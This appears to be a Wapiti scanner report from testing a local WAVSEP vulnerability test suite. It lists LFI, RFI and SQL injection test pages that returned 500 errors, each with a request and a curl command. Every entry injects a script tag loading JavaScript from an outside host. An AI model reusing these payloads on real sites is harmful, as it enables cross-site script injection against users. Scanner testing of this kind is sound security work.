The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwvjxgg7ygcz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwvjxgg7ygcz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw9tdun7p5lz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw9tdun7p5lz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw9r3jjg1b0z.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw9r3jjg1b0z.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fww3q2jjobaz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fww3q2jjobaz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwgbcdkfu4pz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwgbcdkfu4pz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwzo92i231qz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwzo92i231qz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwzm8o5x3zmz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwzm8o5x3zmz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwv9ac7i03dz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwv9ac7i03dz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw2mhjdxan0z.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw2mhjdxan0z.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw8jt4qt2prz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp?target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw8jt4qt2prz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter orderby
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp?orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwga74f57mfz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp?orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwga74f57mfz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp?transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwwi60jitk6z.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp?transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwwi60jitk6z.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp?msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwyk0i224a7z.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp?msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwyk0i224a7z.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter minBalanace
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp?minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwoadmkgghwz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp?minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwoadmkgghwz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgid
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp?msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwlgrlpmdblz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp?msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwlgrlpmdblz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter orderby
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp?orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fweljq0fxmqz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp?orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fweljq0fxmqz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp?transactionDate=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fws5dchl42nz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp?transactionDate=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fws5dchl42nz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp?transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwjr797lw3iz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp?transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwjr797lw3iz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp?msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw2q8xq4s17z.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp?msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw2q8xq4s17z.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter minBalanace
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp?minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwcluc7i0jnz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp?minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwcluc7i0jnz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgid
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp?msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw6654fjkayz.js%3E%3C%2Fscript%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp?msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw6654fjkayz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw3mytoqja7z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw3mytoqja7z.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw110zi0xs8z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw110zi0xs8z.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwlrir9he4zz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwlrir9he4zz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwo0dmk9ld8z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwo0dmk9ld8z.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwfkbt5tvozz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwfkbt5tvozz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw4nu6z655tz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw4nu6z655tz.js%3E%3C%2Fscript%3E"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwi0jelppa2z.js%3E%3C%2Fscript%3E
